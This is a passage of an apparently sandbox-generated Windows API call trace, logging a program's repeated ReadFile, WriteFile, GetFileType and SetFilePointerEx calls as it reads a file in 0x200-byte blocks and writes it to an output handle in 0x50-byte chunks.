(_FileHandle=1) returned 0x50 [0147.702] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.702] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.702] GetFileType (hFile=0x50) returned 0x1 [0147.702] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.702] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.702] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.702] GetFileType (hFile=0x50) returned 0x1 [0147.702] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.702] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.702] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.703] GetFileType (hFile=0x50) returned 0x1 [0147.703] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.703] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.703] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.703] GetFileType (hFile=0x50) returned 0x1 [0147.703] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.703] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.703] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.703] GetFileType (hFile=0x50) returned 0x1 [0147.703] _get_osfhandle (_FileHandle=1) returned 0x50 
[0147.703] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.703] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.703] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.703] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.703] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.703] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.703] GetFileType (hFile=0x50) returned 0x1 [0147.703] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.703] GetFileType (hFile=0x50) returned 0x1 [0147.703] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.703] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.703] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.703] GetFileType (hFile=0x50) returned 0x1 [0147.703] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.703] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.704] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.704] GetFileType (hFile=0x50) returned 0x1 [0147.704] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.704] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 
[0147.704] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.704] GetFileType (hFile=0x50) returned 0x1 [0147.704] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.704] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.704] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.704] GetFileType (hFile=0x50) returned 0x1 [0147.704] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.704] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.704] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.704] GetFileType (hFile=0x50) returned 0x1 [0147.704] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.704] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.704] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.704] GetFileType (hFile=0x50) returned 0x1 [0147.704] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.704] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.705] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.705] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.705] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.705] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, 
lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.705] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.705] GetFileType (hFile=0x50) returned 0x1 [0147.705] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.705] GetFileType (hFile=0x50) returned 0x1 [0147.705] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.705] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.705] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.705] GetFileType (hFile=0x50) returned 0x1 [0147.705] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.705] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.705] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.705] GetFileType (hFile=0x50) returned 0x1 [0147.705] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.705] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.706] GetFileType (hFile=0x50) returned 0x1 [0147.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.706] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.706] GetFileType (hFile=0x50) returned 0x1 [0147.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.706] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.706] GetFileType (hFile=0x50) returned 0x1 [0147.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.706] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.706] GetFileType (hFile=0x50) returned 0x1 [0147.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.706] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.706] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.706] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.706] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.706] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.706] GetFileType (hFile=0x50) returned 0x1 [0147.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.706] GetFileType (hFile=0x50) returned 0x1 [0147.707] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.707] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.707] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.707] GetFileType 
(hFile=0x50) returned 0x1 [0147.707] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.707] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.707] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.707] GetFileType (hFile=0x50) returned 0x1 [0147.707] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.707] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.707] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.707] GetFileType (hFile=0x50) returned 0x1 [0147.707] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.707] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.707] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.707] GetFileType (hFile=0x50) returned 0x1 [0147.707] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.707] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.707] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.707] GetFileType (hFile=0x50) returned 0x1 [0147.707] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.707] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.708] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.708] GetFileType (hFile=0x50) returned 0x1 [0147.708] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0147.708] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.708] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.708] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.708] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.708] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.708] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.708] GetFileType (hFile=0x50) returned 0x1 [0147.708] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.708] GetFileType (hFile=0x50) returned 0x1 [0147.708] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.708] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.708] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.708] GetFileType (hFile=0x50) returned 0x1 [0147.708] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.708] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.708] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.708] GetFileType (hFile=0x50) returned 0x1 [0147.709] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.709] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, 
lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.709] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.709] GetFileType (hFile=0x50) returned 0x1 [0147.709] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.709] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.709] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.709] GetFileType (hFile=0x50) returned 0x1 [0147.709] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.709] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.709] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.709] GetFileType (hFile=0x50) returned 0x1 [0147.709] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.709] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.709] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.709] GetFileType (hFile=0x50) returned 0x1 [0147.709] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.709] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.709] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.709] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.709] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.709] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.709] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.709] GetFileType (hFile=0x50) returned 0x1 [0147.709] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.710] GetFileType (hFile=0x50) returned 0x1 [0147.710] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.710] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.710] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.736] GetFileType (hFile=0x50) returned 0x1 [0147.736] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.736] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.736] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.736] GetFileType (hFile=0x50) returned 0x1 [0147.736] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.736] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.736] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.736] GetFileType (hFile=0x50) returned 0x1 [0147.736] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.736] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.736] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.736] GetFileType (hFile=0x50) returned 0x1 [0147.736] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.736] WriteFile (in: 
hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.736] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.736] GetFileType (hFile=0x50) returned 0x1 [0147.736] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.736] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.736] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.736] GetFileType (hFile=0x50) returned 0x1 [0147.737] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.737] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.737] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.737] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.737] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.737] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.737] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.737] GetFileType (hFile=0x50) returned 0x1 [0147.737] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.737] GetFileType (hFile=0x50) returned 0x1 [0147.737] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.737] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.737] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0147.737] GetFileType (hFile=0x50) returned 0x1 [0147.737] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.737] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.737] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.737] GetFileType (hFile=0x50) returned 0x1 [0147.737] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.737] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.737] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.737] GetFileType (hFile=0x50) returned 0x1 [0147.737] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.737] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.738] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.738] GetFileType (hFile=0x50) returned 0x1 [0147.738] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.738] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.738] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.738] GetFileType (hFile=0x50) returned 0x1 [0147.738] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.738] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.738] _get_osfhandle (_FileHandle=1) returned 0x50 
[0147.738] GetFileType (hFile=0x50) returned 0x1 [0147.738] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.738] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.738] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.738] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.738] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.738] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.738] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.738] GetFileType (hFile=0x50) returned 0x1 [0147.738] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.738] GetFileType (hFile=0x50) returned 0x1 [0147.738] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.738] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.738] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.738] GetFileType (hFile=0x50) returned 0x1 [0147.738] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.738] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.738] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.738] GetFileType (hFile=0x50) returned 0x1 [0147.738] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.738] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, 
